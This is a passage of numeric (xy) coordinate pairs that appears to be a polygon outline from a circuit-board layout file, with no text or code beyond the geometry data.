117.979365 114.772174) (xy 118.035604 114.790014) (xy 118.039041 114.7904) (xy 118.042356 114.791412) (xy 118.101061 114.797357) (xy 118.159731 114.803938) (xy 118.166518 114.803985) (xy 118.166626 114.803996) (xy 118.166726 114.803987) (xy 118.168667 114.804) (xy 118.713277 114.804) (xy 118.768792 114.798557) (xy 118.824414 114.794277) (xy 118.830897 114.792467) (xy 118.837587 114.791811) (xy 118.890957 114.775698) (xy 118.944718 114.760687) (xy 118.950726 114.757652) (xy 118.957162 114.755709) (xy 119.006418 114.72952) (xy 119.056207 114.704369) (xy 119.061505 114.70023) (xy 119.067448 114.69707) (xy 119.110686 114.661806) (xy 119.154635 114.627469) (xy 119.159032 114.622375) (xy 119.164243 114.618125) (xy 119.19979 114.575156) (xy 119.236251 114.532915) (xy 119.239575 114.527064) (xy 119.243861 114.521883) (xy 119.248208 114.513843) (xy 119.24852 114.51444) (xy 119.252674 114.519607) (xy 119.25587 114.525424) (xy 119.291765 114.568227) (xy 119.326786 114.611785) (xy 119.331873 114.616053) (xy 119.336131 114.621131) (xy 119.379627 114.656124) (xy 119.42247 114.692073) (xy 119.428288 114.695271) (xy 119.433452 114.699426) (xy 119.482924 114.725308) (xy 119.531926 114.752247) (xy 119.538253 114.754254) (xy 119.544127 114.757327) (xy 119.597706 114.773113) (xy 119.650986 114.790014) (xy 119.657579 114.790754) (xy 119.663941 114.792628) (xy 119.719554 114.797706) (xy 119.775113 114.803938) (xy 119.784049 114.804) (xy 120.333811 114.804) (xy 120.335439 114.80384) (xy 120.33706 114.803991) (xy 120.397521 114.797753) (xy 120.458121 114.791811) (xy 120.459682 114.79134) (xy 120.461307 114.791172) (xy 120.519557 114.773262) (xy 120.577696 114.755709) (xy 120.579133 114.754945) (xy 120.580697 114.754464) (xy 120.634221 114.725655) (xy 120.687982 114.69707) (xy 120.689252 114.696034) (xy 120.690683 114.695264) (xy 120.737582 114.656617) (xy 120.784777 114.618125) (xy 120.785816 114.616869) (xy 120.787077 114.61583) (xy 120.825701 114.568656) (xy 120.864395 114.521883) (xy 120.865169 114.520452) (xy 120.866206 114.519185) (xy 120.894923 114.465422) (xy 120.918404 114.421996) (xy 120.93198 114.434803) (xy 120.939086 114.440221) (xy 121.133127 114.586062) (xy 121.160583 114.602774) (xy 121.186327 114.622017) (xy 121.213803 114.635168) (xy 121.239822 114.651006) (xy 121.269995 114.662065) (xy 121.298991 114.675944) (xy 121.307411 114.678938) (xy 121.564559 114.768375) (xy 121.567937 114.769191) (xy 121.57082 114.770487) (xy 121.60165 114.777609) (xy 121.631977 114.787754) (xy 121.640701 114.789687) (xy 121.640939 114.789737) (xy 121.663771 114.792336) (xy 121.685975 114.797699) (xy 121.689189 114.797832) (xy 121.69252 114.798602) (xy 121.70139 114.799692) (xy 121.81442 114.812786) (xy 121.834398 114.813137) (xy 121.854165 114.81614) (xy 121.863092 114.81655) (xy 122.029933 114.823066) (xy 122.037164 114.822641) (xy 122.044373 114.823468) (xy 122.053309 114.823552) (xy 122.250893 114.824046) (xy 122.254966 114.823657) (xy 122.259047 114.824015) (xy 122.267982 114.823861) (xy 122.473237 114.818892) (xy 122.47764 114.818352) (xy 122.482064 114.818617) (xy 122.490991 114.818215) (xy 122.68085 114.80834) (xy 122.689659 114.807011) (xy 122.698568 114.807172) (xy 122.70747 114.806398) (xy 122.858863 114.792175) (xy 122.887232 114.786677) (xy 122.916032 114.78419) (xy 122.924806 114.782494) (xy 123.014663 114.764479) (xy 123.025125 114.761293) (xy 123.035969 114.759829) (xy 123.084785 114.743125) (xy 123.134152 114.728092) (xy 123.143803 114.722931) (xy 123.154148 114.719391) (xy 123.198785 114.693528) (xy 123.242171 114.670326) (xy 123.268088 114.692073) (xy 123.270058 114.693156) (xy 123.271784 114.694584) (xy 123.324676 114.723183) (xy 123.377544 114.752247) (xy 123.379687 114.752927) (xy 123.381657 114.753992) (xy 123.439172 114.771796) (xy 123.496604 114.790014) (xy 123.498832 114.790264) (xy 123.500977 114.790928) (xy 123.560844 114.79722) (xy 123.620731 114.803938) (xy 123.625046 114.803968) (xy 123.625199 114.803984) (xy 123.625352 114.80397) (xy 123.629667 114.804) (xy 124.18 114.804) (xy 124.239938 114.798123) (xy 124.299924 114.792664) (xy 124.302079 114.79203) (xy 124.30431 114.791811) (xy 124.361891 114.774426) (xy 124.419748 114.757398) (xy 124.42174 114.756357) (xy 124.423885 114.755709) (xy 124.477082 114.727424) (xy 124.53044 114.699529) (xy 124.532185 114.698126) (xy 124.534171 114.69707) (xy 124.580854 114.658995) (xy 124.60363 114.640684) (xy 124.618871 114.653293) (xy 124.665088 114.692073) (xy 124.667058 114.693156) (xy 124.668784 114.694584) (xy 124.721676 114.723183) (xy 124.774544 114.752247) (xy 124.776687 114.752927) (xy 124.778657 114.753992) (xy 124.836172 114.771796) (xy 124.893604 114.790014) (xy 124.895832 114.790264) (xy 124.897977 114.790928) (xy 124.957844 114.79722) (xy 125.017731 114.803938) (xy 125.022046 114.803968) (xy 125.022199 114.803984) (xy 125.022352 114.80397) (xy 125.026667 114.804) (xy 125.577 114.804) (xy 125.636938 114.798123) (xy 125.696924 114.792664) (xy 125.699079 114.79203) (xy 125.70131 114.791811) (xy 125.758891 114.774426) (xy 125.816748 114.757398) (xy 125.81874 114.756357) (xy 125.820885 114.755709) (xy 125.874082 114.727424) (xy 125.92744 114.699529) (xy 125.929185 114.698126) (xy 125.931171 114.69707) (xy 125.977854 114.658995) (xy 126.024785 114.621263) (xy 126.02623 114.619541) (xy 126.027966 114.618125) (xy 126.066296 114.571792) (xy 126.105073 114.525579) (xy 126.106156 114.523609) (xy 126.107584 114.521883) (xy 126.136183 114.468991) (xy 126.14963 114.444529) (xy 126.233953 114.554111) (xy 126.259958 114.581824) (xy 126.283765 114.611454) (xy 126.302602 114.62727) (xy 126.319423 114.645196) (xy 126.350312 114.667328) (xy 126.379425 114.691772) (xy 126.400972 114.703626) (xy 126.420956 114.717945) (xy 126.455559 114.733658) (xy 126.488862 114.75198) (xy 126.512294 114.759421) (xy 126.534686 114.769589) (xy 126.571697 114.778284) (xy 126.60791 114.789784) (xy 126.63234 114.792532) (xy 126.656282 114.798157) (xy 126.694265 114.799498) (xy 126.732033 114.803746) (xy 126.740969 114.803811) (xy 127.047885 114.803906) (xy 127.047978 114.803897) (xy 127.049476 114.803904) (xy 127.070146 114.803859) (xy 127.072667 114.803606) (xy 127.075201 114.803829) (xy 127.084135 114.803676) (xy 127.229132 114.80019) (xy 127.241729 114.798648) (xy 127.254421 114.799082) (xy 127.263334 114.798451) (xy 127.365766 114.790491) (xy 127.423127 114.780332) (xy 127.48057 114.770942) (xy 127.48873 114.768713) (xy 127.488758 114.768708) (xy 127.488782 114.768699) (xy 127.489191 114.768587) (xy 127.52801 114.757687) (xy 127.547272 114.750183) (xy 127.567342 114.745262) (xy 127.605337 114.727563) (xy 127.644397 114.712347) (xy 127.661829 114.701249) (xy 127.680567 114.69252) (xy 127.71441 114.667771) (xy 127.749761 114.645264) (xy 127.764705 114.630991) (xy 127.78139 114.61879) (xy 127.80977 114.587952) (xy 127.840089 114.558995) (xy 127.851982 114.542083) (xy 127.865973 114.52688) (xy 127.887826 114.491113) (xy 127.911939 114.456823) (xy 127.920315 114.437936) (xy 127.931094 114.420293) (xy 127.939993 114.396135) (xy 127.940425 114.395363) (xy 127.941541 114.391933) (xy 127.945591 114.38094) (xy 127.962575 114.342641) (xy 127.967122 114.32249) (xy 127.97427 114.303086) (xy 127.977911 114.280157) (xy 127.979073 114.276586) (xy 127.980871 114.261562) (xy 127.990069 114.220799) (xy 127.990616 114.20015) (xy 127.993859 114.179726) (xy 127.993088 114.159456) (xy 127.993913 114.152564) (xy 127.992399 114.132785) (xy 127.993375 114.095937) (xy 127.989898 114.075563) (xy 127.989113 114.054909) (xy 127.985171 114.038333) (xy 127.984382 114.028023) (xy 127.977688 114.004011) (xy 127.972364 113.97281) (xy 127.964997 113.953502) (xy 127.960215 113.933393) (xy 127.95725 113.924963) (xy 127.956309 113.922346) (xy 127.952947 113.915258) (xy 127.950841 113.907704) (xy 127.937238 113.880746) (xy 127.927838 113.85611) (xy 127.915724 113.836786) (xy 127.902777 113.809492) (xy 127.898104 113.803195) (xy 127.89457 113.796191) (xy 127.889732 113.788678) (xy 127.856448 113.737769) (xy 127.851322 113.731388) (xy 127.847343 113.724221) (xy 127.842212 113.716905) (xy 127.766901 113.61108) (xy 127.766854 113.611026) (xy 127.762366 113.604788) (xy 127.652693 113.454566) (xy 127.652586 113.454446) (xy 127.650069 113.450998) (xy 127.513697 113.266895) (xy 127.513603 113.266791) (xy 127.511654 113.264151) (xy 127.356344 113.056807) (xy 127.248879 112.912812) (xy 127.142974 112.766045) (xy 127.162423 112.741541) (xy 127.191507 112.704946) (xy 127.191536 112.704901) (xy 127.192008 112.704314) (xy 127.343933 112.512651) (xy 127.343965 112.512601) (xy 127.344547 112.511875) (xy 127.503716 112.310434) (xy 127.503751 112.31038) (xy 127.504407 112.309558) (xy 127.640799 112.136323) (xy 127.640827 112.136279) (xy 127.641344 112.13563) (xy 127.865685 111.84988) (xy 127.878208 111.83025) (xy 127.893036 111.812309) (xy 127.911715 111.777726) (xy 127.932862 111.744577) (xy 127.941332 111.722891) (xy 127.952395 111.702409) (xy 127.964004 111.664845) (xy 127.978305 111.628231) (xy 127.982402 111.605316) (xy 127.989276 111.583072) (xy 127.993367 111.543976) (xy 128.000286 111.505274) (xy 127.999853 111.481995) (xy 128.002276 111.458844) (xy 127.998696 111.419699) (xy 127.997965 111.380389) (xy 127.993019 111.357639) (xy 127.990899 111.334458) (xy 127.979782 111.296749) (xy 127.971431 111.258334) (xy 127.962163 111.236983) (xy 127.955579 111.21465) (xy 127.937343 111.179806) (xy 127.921695 111.143757) (xy 127.908456 111.124612) (xy 127.89766 111.103984) (xy 127.873009 111.073352) (xy 127.850653 111.041023) (xy 127.833952 111.024819) (xy 127.81935 111.006674) (xy 127.789205 110.981403) (xy 127.761007 110.954044) (xy 127.741477 110.941392) (xy 127.723629 110.92643) (xy 127.689164 110.907503) (xy 127.656176 110.886133) (xy 127.634553 110.877513) (xy 127.614146 110.866306) (xy 127.576668 110.854436) (xy 127.54015 110.839878) (xy 127.517259 110.835621) (xy 127.495069 110.828593) (xy 127.456004 110.824229) (xy 127.41735 110.81704) (xy 127.394072 110.81731) (xy 127.370935 110.814725) (xy 127.361999 110.814667) (xy 127.051437 110.814808) (xy 126.740876 110.814949) (xy 126.706788 110.818307) (xy 126.672524 110.81864) (xy 126.644766 110.824417) (xy 126.616572 110.827195) (xy 126.58379 110.837109) (xy 126.550238 110.844092) (xy 126.524134 110.855149) (xy 126.497013 110.863351) (xy 126.466778 110.879444) (xy 126.435225 110.89281) (xy 126.411772 110.908723) (xy 126.386754 110.92204) (xy 126.360209 110.94371) (xy 126.331865 110.962942) (xy 126.311951 110.983105) (xy 126.289995 111.001029) (xy 126.268175 111.02743) (xy 126.244095 111.051811) (xy 126.238515 111.058791) (xy 126.223971 111.077245) (xy 126.215608 110.220751) (xy 126.211334 110.181152) (xy 126.227844 110.182887) (xy 126.287731 110.189605) (xy 126.292046 110.189635) (xy 126.292199 110.189651) (xy 126.292352 110.189637) (xy 126.296667 110.189667) (xy 126.804667 110.189667) (xy 126.864605 110.18379) (xy 126.924591 110.178331) (xy 126.926746 110.177697) (xy 126.928977 110.177478) (xy 126.986558 110.160093) (xy 127.044415 110.143065) (xy 127.046407 110.142024) (xy 127.048552 110.141376) (xy 127.101749 110.113091) (xy 127.155107 110.085196) (xy 127.156852 110.083793) (xy 127.158838 110.082737) (xy 127.205521 110.044662) (xy 127.252452 110.00693) (xy 127.253897 110.005208) (xy 127.255633 110.003792) (xy 127.29396 109.957463) (xy 127.33274 109.911246) (xy 127.333823 109.909276) (xy 127.335251 109.90755) (xy 127.36385 109.854658) (xy 127.392914 109.80179) (xy 127.393594 109.799647) (xy 127.394659 109.797677) (xy 127.412473 109.74013) (xy 127.430681 109.68273) (xy 127.430931 109.680502) (xy 127.431595 109.678357) (xy 127.437887 109.61849) (xy 127.444605 109.558603) (xy 127.444635 109.554288) (xy 127.444651 109.554135) (xy 127.444637 109.553982) (xy 127.444667 109.549667) (xy 127.444667 108.280026) (xy 127.457271 108.27879) (xy 127.517257 108.273331) (xy 127.519412 108.272697) (xy 127.521643 108.272478) (xy 127.579224 108.255093) (xy 127.637081 108.238065) (xy 127.639073 108.237024) (xy 127.641218 108.236376) (xy 127.694415 108.208091) (xy 127.747773 108.180196) (xy 127.749518 108.178793) (xy 127.751504 108.177737) (xy 127.798187 108.139662) (xy 127.845118 108.10193) (xy 127.846563 108.100208) (xy 127.848299 108.098792) (xy 127.886648 108.052436) (xy 127.925406 108.006246) (xy 127.926489 108.004276) (xy 127.927917 108.00255) (xy 127.956516 107.949658) (xy 127.98558 107.89679) (xy 127.98626 107.894647) (xy 127.987325 107.892677) (xy 128.005159 107.835066) (xy 128.023347 107.77773) (xy 128.023597 107.775502) (xy 128.024261 107.773357) (xy 128.030553 107.71349) (xy 128.037271 107.653603) (xy 128.037301 107.649288) (xy 128.037317 107.649135) (xy 128.037303 107.648982) (xy 128.037333 107.644667) (xy 128.037333 107.221333) (xy 128.031456 107.161395) (xy 128.025997 107.101409) (xy 128.025363 107.099254) (xy 128.025144 107.097023) (xy 128.007734 107.039357) (xy 127.990731 106.981585) (xy 127.98969 106.979593) (xy 127.989042 106.977448) (xy 127.960757 106.924251) (xy 127.935713 106.876347) (xy 127.939256 106.869902) (xy 127.955678 106.846326) (xy 127.969261 106.815322) (xy 127.98558 106.785639) (xy 127.994273 106.758235) (xy 128.005802 106.73192) (xy 128.013106 106.698863) (xy 128.023347 106.666579) (xy 128.026551 106.638013) (xy 128.032751 106.609955) (xy 128.033495 106.576112) (xy 128.037271 106.542452) (xy 128.037333 106.533516) (xy 128.037333 106.151256) (xy 128.035768 106.1353) (xy 128.036534 106.119286) (xy 128.029685 106.073253) (xy 128.025144 106.026946) (xy 128.020511 106.011601) (xy 128.018151 105.99574) (xy 128.002489 105.95191) (xy 127.989042 105.907371) (xy 127.981516 105.893217) (xy 127.976121 105.878118) (xy 127.952252 105.838178) (xy 127.930403 105.797085) (xy 127.920268 105.784658) (xy 127.912045 105.770899) (xy 127.880872 105.736354) (xy 127.851458 105.70029) (xy 127.839105 105.690071) (xy 127.828364 105.678168) (xy 127.791069 105.650332) (xy 127.755216 105.620672) (xy 127.741114 105.613047) (xy 127.728265 105.603457) (xy 127.686273 105.583395) (xy 127.645343 105.561264) (xy 127.63003 105.556524) (xy 127.615561 105.549611) (xy 127.570477 105.538089) (xy 127.526023 105.524328) (xy 127.510074 105.522652) (xy 127.494545 105.518683) (xy 127.448083 105.516136) (xy 127.401801 105.511272) (xy 127.385838 105.512725) (xy 127.369826 105.511847) (xy 127.360901 105.512294) (xy 126.987154 105.533604) (xy 126.980814 105.534593) (xy 126.974387 105.534459) (xy 126.965482 105.535209) (xy 126.734778 105.556241) (xy 126.69427 105.563975) (xy 126.653334 105.568997) (xy 126.644627 105.571006) (xy 126.456176 105.615881) (xy 126.424298 105.626854) (xy 126.391563 105.634911) (xy 126.365384 105.647133) (xy 126.338071 105.656535) (xy 126.308941 105.673485) (xy 126.278385 105.687751) (xy 126.270727 105.692358) (xy 126.140533 105.771913) (xy 126.132821 105.77773) (xy 126.124255 105.782199) (xy 126.083023 105.815293) (xy 126.040815 105.84713) (xy 126.034379 105.854336) (xy 126.026844 105.860383) (xy 125.992817 105.900864) (xy 125.957605 105.940284) (xy 125.952693 105.948598) (xy 125.946474 105.955997) (xy 125.941471 105.963401) (xy 125.857193 106.090014) (xy 125.84037 106.121588) (xy 125.820962 106.151653) (xy 125.81107 106.17658) (xy 125.798459 106.200249) (xy 125.788089 106.234491) (xy 125.77489 106.267751) (xy 125.77248 106.276356) (xy 125.721774 106.462409) (xy 125.714362 106.506025) (xy 125.704469 106.549146) (xy 125.703393 106.558017) (xy 125.699072 106.595822) (xy 125.649109 106.610907) (xy 125.591252 106.627935) (xy 125.58926 106.628976) (xy 125.587115 106.629624) (xy 125.533918 106.657909) (xy 125.48056 106.685804) (xy 125.478815 106.687207) (xy 125.476829 106.688263) (xy 125.430146 106.726338) (xy 125.420131 106.734389) (xy 125.417887 106.732806) (xy 125.390899 106.720788) (xy 125.365299 106.706056) (xy 125.333995 106.695449) (xy 125.303783 106.681995) (xy 125.295284 106.679234) (xy 125.095163 106.615739) (xy 125.043397 106.604733) (xy 124.991988 106.592183) (xy 124.983132 106.590983) (xy 124.718603 106.557011) (xy 124.684703 106.555994) (xy 124.651032 106.55195) (xy 124.642097 106.551818) (xy 124.307958 106.549199) (xy 124.256978 106.553794) (xy 124.205857 106.556585) (xy 124.197034 106.558003) (xy 123.903144 106.607316) (xy 123.892157 106.610286) (xy 123.880835 106.611467) (xy 123.831947 106.62656) (xy 123.782565 106.639907) (xy 123.772365 106.644954) (xy 123.761487 106.648312) (xy 123.753271 106.651826) (xy 123.520564 106.753285) (xy 123.488752 106.771032) (xy 123.455596 106.786127) (xy 123.434339 106.801388) (xy 123.411484 106.814139) (xy 123.383731 106.837723) (xy 123.354133 106.858973) (xy 123.347459 106.864916) (xy 123.308395 106.900185) (xy 123.277766 106.863011) (xy 123.243189 106.819214) (xy 123.238089 106.814857) (xy 123.233822 106.809678) (xy 123.190642 106.774319) (xy 123.148223 106.738078) (xy 123.142373 106.734794) (xy 123.137182 106.730543) (xy 123.08796 106.704246) (xy 123.039307 106.676932) (xy 123.032932 106.674847) (xy 123.027013 106.671685) (xy 123.018734 106.668322) (xy 122.94569 106.639235) (xy 122.938828 106.637253) (xy 122.932418 106.634121) (xy 122.8789 106.619941) (xy 122.825691 106.60457) (xy 122.818581 106.603959) (xy 122.811679 106.60213) (xy 122.802849 106.600757) (xy 122.72463 106.589151) (xy 122.705012 106.588178) (xy 122.685694 106.584587) (xy 122.676786 106.583882) (xy 122.530348 106.573309) (xy 122.524169 106.573468) (xy 122.518055 106.57254) (xy 122.509128 106.57213) (xy 122.319813 106.564768) (xy 122.316418 106.564968) (xy 122.313047 106.564541) (xy 122.304113 106.564351) (xy 122.093668 106.561336) (xy 122.088382 106.561778) (xy 122.083092 106.561271) (xy 122.074156 106.561354) (xy 121.86492 106.564736) (xy 121.846096 106.566889) (xy 121.827145 106.566463) (xy 121.818239 106.567198) (xy 121.552132 106.591003) (xy 121.50368 106.600168) (xy 121.454865 106.607333) (xy 121.446208 106.609549) (xy 121.248437 106.661619) (xy 121.22032 106.672048) (xy 121.191286 106.679565) (xy 121.161905 106.693715) (xy 121.131328 106.705056) (xy 121.105772 106.720748) (xy 121.078751 106.733761) (xy 121.071149 106.738459) (xy 120.932883 106.825244) (xy 120.931601 106.826235) (xy 120.930149 106.826969) (xy 120.882146 106.864479) (xy 120.834074 106.901654) (xy 120.833594 106.902204) (xy 120.82582 106.894197) (xy 120.803472 106.87528) (xy 120.783212 106.854146) (xy 120.755918 106.835027) (xy 120.730484 106.813498) (xy 120.704892 106.799284) (xy 120.680909 106.782485) (xy 120.673093 106.778151) (xy 120.551974 106.712087) (xy 120.541053 106.707449) (xy 120.531012 106.701152) (xy 120.483676 106.683082) (xy 120.437006 106.663262) (xy 120.425398 106.660835) (xy 120.41432 106.656606) (xy 120.405684 106.654309) (xy 120.240691 106.611659) (xy 120.1978 106.604948) (xy 120.155387 106.595686) (xy 120.146505 106.594703) (xy 119.924327 106.571673) (xy 119.903583 106.571558) (xy 119.883026 106.568738) (xy 119.874094 106.568456) (xy 119.58142 106.56125) (xy 119.575197 106.561706) (xy 119.568984 106.561064) (xy 119.560048 106.561081) (xy 119.407087 106.562424) (xy 119.396391 106.563568) (xy 119.385641 106.562971) (xy 119.376716 106.563412) (xy 119.117324 106.578022) (xy 119.084705 106.583086) (xy 119.051748 106.585119) (xy 119.042935 106.586599) (xy 118.847003 106.620905) (xy 118.787391 106.637472) (xy 118.727664 106.653962) (xy 118.72671 106.654336) (xy 118.726658 106.654351) (xy 118.726604 106.654378) (xy 118.719346 106.657228) (xy 118.573275 106.715755) (xy 118.550233 106.727717) (xy 118.525982 106.736966) (xy 118.494932 106.756425) (xy 118.471933 106.768365) (xy 118.47528 106.423206) (xy 118.475203 106.422334) (xy 118.475294 106.421468) (xy 118.469696 106.35995) (xy 118.464297 106.298784) (xy 118.464053 106.297948) (xy 118.463974 106.297076) (xy 118.446487 106.237659) (xy 118.429356 106.178864) (xy 118.428955 106.178093) (xy 118.428708 106.177252) (xy 118.400167 106.122659) (xy 118.371789 106.068015) (xy 118.371242 106.067331) (xy 118.370839 106.06656) (xy 118.33217 106.018464) (xy 118.293787 105.970459) (xy 118.293122 105.969898) (xy 118.292573 105.969215) (xy 118.245218 105.92948) (xy 118.198321 105.889911) (xy 118.19756 105.88949) (xy 118.196889 105.888927) (xy 118.142636 105.859101) (xy 118.089029 105.829441) (xy 118.088204 105.829177) (xy 118.087433 105.828753) (xy 118.028472 105.81005) (xy 117.970073 105.79135) (xy 117.969207 105.79125) (xy 117.968373 105.790986) (xy 117.906872 105.784087) (xy 117.845984 105.77709) (xy 117.845121 105.77716) (xy 117.844246 105.777062) (xy 117.83531 105.777) (xy 117.325562 105.777) (xy 117.284667 105.78101) (xy 117.284667 105.739667) (xy 117.27879 105.679729) (xy 117.273331 105.619743) (xy 117.272697 105.617588) (xy 117.272478 105.615357) (xy 117.255093 105.557776) (xy 117.238065 105.499919) (xy 117.237024 105.497927) (xy 117.236376 105.495782) (xy 117.208091 105.442585) (xy 117.180196 105.389227) (xy 117.178793 105.387482) (xy 117.177737 105.385496) (xy 117.139644 105.33879) (xy 117.10193 105.291882) (xy 117.100208 105.290437) (xy 117.098792 105.288701) (xy 117.052463 105.250374) (xy 117.006246 105.211594) (xy 117.004276 105.210511) (xy 117.00255 105.209083) (xy 116.949658 105.180484) (xy 116.89679 105.15142) (xy 116.894647 105.15074) (xy 116.892677 105.149675) (xy 116.835162 105.131871) (xy 116.77773 105.113653) (xy 116.775502 105.113403) (xy 116.773357 105.112739) (xy 116.71349 105.106447) (xy 116.653603 105.099729) (xy 116.649288 105.099699) (xy 116.649135 105.099683) (xy 116.648982 105.099697) (xy 116.644667 105.099667) (xy 116.537917 105.099667) (xy 116.521013 105.101325) (xy 116.504045 105.100564) (xy 116.495125 105.101099) (xy 116.444373 105.1045) (xy 116.403293 105.111326) (xy 116.361843 105.115458) (xy 116.341806 105.121543) (xy 116.321157 105.124974) (xy 116.282185 105.139649) (xy 116.242327 105.151753) (xy 116.223856 105.161612) (xy 116.204263 105.16899) (xy 116.168881 105.190957) (xy 116.132136 105.21057) (xy 116.124736 105.215579) (xy 116.093737 105.236878) (xy 116.072254 105.254963) (xy 116.04895 105.270632) (xy 116.024587 105.295092) (xy 115.998183 105.317321) (xy 115.980626 105.33923) (xy 115.960805 105.35913) (xy 115.941659 105.387855) (xy 115.920073 105.414791) (xy 115.9071 105.439704) (xy 115.891529 105.463065) (xy 115.878331 105.494951) (xy 115.862383 105.525576) (xy 115.854498 105.552528) (xy 115.843758 105.578475) (xy 115.841223 105.587044) (xy 115.825107 105.642932) (xy 115.824262 105.647499) (xy 115.82261 105.651834) (xy 115.819938 105.667533) (xy 115.746716 105.677789) (xy 115.705334 105.68778) (xy 115.663415 105.69517) (xy 115.644756 105.702406) (xy 115.625298 105.707104) (xy 115.586655 105.724938) (xy 115.54696 105.740332) (xy 115.539012 105.744417) (xy 115.391456 105.821548) (xy 115.390149 105.822403) (xy 115.37895 105.813543) (xy 115.341162 105.794163) (xy 115.304667 105.772455) (xy 115.285714 105.765727) (xy 115.267809 105.756544) (xy 115.259474 105.75332) (xy 115.176598 105.72192) (xy 115.174059 105.721233) (xy 115.171698 105.720087) (xy 115.113826 105.704923) (xy 115.056033 105.689275) (xy 115.053413 105.689094) (xy 115.050871 105.688428) (xy 115.042037 105.687079) (xy 114.856147 105.660019) (xy 114.798782 105.657332) (xy 114.741502 105.653738) (xy 114.732573 105.654114) (xy 114.530197 105.664049) (xy 114.469588 105.67301) (xy 114.409003 105.681732) (xy 114.406759 105.6823) (xy 114.406634 105.682318) (xy 114.406507 105.682363) (xy 114.400339 105.683923) (xy 114.219728 105.730942) (xy 114.172964 105.748141) (xy 114.125545 105.763477) (xy 114.114435 105.769666) (xy 114.102499 105.774056) (xy 114.059975 105.800005) (xy 114.016428 105.824264) (xy 114.009119 105.829405) (xy 113.996238 105.8386) (xy 113.98013 105.825288) (xy 113.972684 105.820347) (xy 113.900306 105.773038) (xy 113.845699 105.744527) (xy 113.791133 105.715855) (xy 113.790327 105.715616) (xy 113.789584 105.715228) (xy 113.73067 105.697922) (xy 113.671384 105.680338) (xy 113.669824 105.680048) (xy 113.669741 105.680024) (xy 113.669646 105.680015) (xy 113.662598 105.678707) (xy 113.572411 105.66261) (xy 113.568444 105.662296) (xy 113.564601 105.661266) (xy 113.506205 105.657376) (xy 113.447893 105.652767) (xy 113.443944 105.65323) (xy 113.439972 105.652965) (xy 113.431042 105.653307) (xy 113.290176 105.659678) (xy 113.271825 105.662319) (xy 113.253272 105.662417) (xy 113.24439 105.663399) (xy 113.176081 105.671427) (xy 113.144135 105.678394) (xy 113.111663 105.682355) (xy 113.102954 105.684359) (xy 113.05257 105.69632) (xy 113.036898 105.688794) (xy 113.025538 105.685866) (xy 113.01479 105.68118) (xy 112.965168 105.670308) (xy 112.915945 105.657622) (xy 112.904232 105.656957) (xy 112.892778 105.654447) (xy 112.841967 105.65342) (xy 112.791239 105.650538) (xy 112.779627 105.652159) (xy 112.767897 105.651922) (xy 112.717861 105.660783) (xy 112.69182 105.664418) (xy 112.687329 105.664749) (xy 112.685152 105.665349) (xy 112.667533 105.667809) (xy 112.658861 105.669963) (xy 112.637809 105.675348) (xy 112.602812 105.68805) (xy 112.566915 105.697947) (xy 112.544235 105.709311) (xy 112.520397 105.717963) (xy 112.515974 105.720636) (xy 112.498723 105.71062) (xy 112.460123 105.697373) (xy 112.422502 105.681534) (xy 112.401173 105.677143) (xy 112.38058 105.670076) (xy 112.34014 105.664578) (xy 112.300162 105.656348) (xy 112.291269 105.655471) (xy 112.260651 105.652667) (xy 112.213406 105.65297) (xy 112.166205 105.651018) (xy 112.151068 105.65337) (xy 112.135747 105.653468) (xy 112.089472 105.66294) (xy 112.042781 105.670194) (xy 112.034142 105.672482) (xy 111.973016 105.689126) (xy 111.964517 105.69236) (xy 111.829609 105.668884) (xy 111.803163 105.666909) (xy 111.777104 105.661971) (xy 111.768198 105.661235) (xy 111.727048 105.65812) (xy 111.707535 105.658553) (xy 111.688127 105.656362) (xy 111.679192 105.656294) (xy 111.550501 105.656203) (xy 111.523899 105.658792) (xy 111.497173 105.658391) (xy 111.461984 105.664811) (xy 111.458033 105.652733) (xy 111.449577 105.617319) (xy 111.446604 105.608892) (xy 111.421778 105.540047) (xy 111.419068 105.534347) (xy 111.417398 105.528266) (xy 111.392272 105.477991) (xy 111.368143 105.427243) (xy 111.364381 105.422184) (xy 111.361559 105.416536) (xy 111.327124 105.372071) (xy 111.293619 105.327005) (xy 111.288946 105.322772) (xy 111.28508 105.31778) (xy 111.242675 105.280859) (xy 111.201045 105.24315) (xy 111.195637 105.239904) (xy 111.190877 105.23576) (xy 111.142141 105.207798) (xy 111.093946 105.178874) (xy 111.088004 105.176738) (xy 111.082536 105.173601) (xy 111.029289 105.155634) (xy 110.976402 105.136625) (xy 110.970168 105.135686) (xy 110.964186 105.133667) (xy 110.955466 105.131711) (xy 110.874907 105.114227) (xy 110.866243 105.113218) (xy 110.857884 105.110775) (xy 110.804295 105.106001) (xy 110.75084 105.099774) (xy 110.742157 105.100466) (xy 110.733471 105.099692) (xy 110.724536 105.099834) (xy 110.705032 105.10028) (xy 110.668867 105.104663) (xy 110.632476 105.10608) (xy 110.607018 105.112159) (xy 110.581033 105.115308) (xy 110.546418 105.126629) (xy 110.510986 105.135089) (xy 110.502559 105.138062) (xy 110.433714 105.162888) (xy 110.428022 105.165594) (xy 110.421938 105.167265) (xy 110.371618 105.192413) (xy 110.32091 105.216523) (xy 110.315857 105.22028) (xy 110.310208 105.223103) (xy 110.265719 105.257556) (xy 110.220672 105.291047) (xy 110.216442 105.295716) (xy 110.211452 105.299581) (xy 110.174531 105.341985) (xy 110.136817 105.383621) (xy 110.133572 105.389028) (xy 110.129431 105.393784) (xy 110.101465 105.442526) (xy 110.072541 105.49072) (xy 110.070408 105.496656) (xy 110.06727 105.502124) (xy 110.049301 105.555378) (xy 110.030292 105.608264) (xy 110.029353 105.614498) (xy 110.027336 105.620474) (xy 110.02538 105.629193) (xy 110.019363 105.656918) (xy 110.004513 105.656333) (xy 109.956463 105.652283) (xy 109.947528 105.652468) (xy 109.723841 105.658645) (xy 109.710247 105.660358) (xy 109.696549 105.659982) (xy 109.68764 105.660672) (xy 109.63549 105.665077) (xy 109.608504 105.670044) (xy 109.581131 105.672023) (xy 109.572334 105.673596) (xy 109.399865 105.705673) (xy 109.355283 105.718572) (xy 109.310112 105.729208) (xy 109.295401 105.735896) (xy 109.27988 105.740387) (xy 109.238672 105.761689) (xy 109.196407 105.780905) (xy 109.188704 105.785435) (xy 109.167714 105.797972) (xy 109.166311 105.796939) (xy 109.149753 105.789155) (xy 109.134427 105.779161) (xy 109.093334 105.762634) (xy 109.053272 105.743801) (xy 109.035526 105.739384) (xy 109.018543 105.732553) (xy 109.009949 105.730104) (xy 108.839324 105.682756) (xy 108.821488 105.67964) (xy 108.804266 105.674086) (xy 108.76009 105.668915) (xy 108.716281 105.661262) (xy 108.698194 105.661669) (xy 108.680208 105.659564) (xy 108.671272 105.659459) (xy 108.433534 105.658315) (xy 108.407335 105.660757) (xy 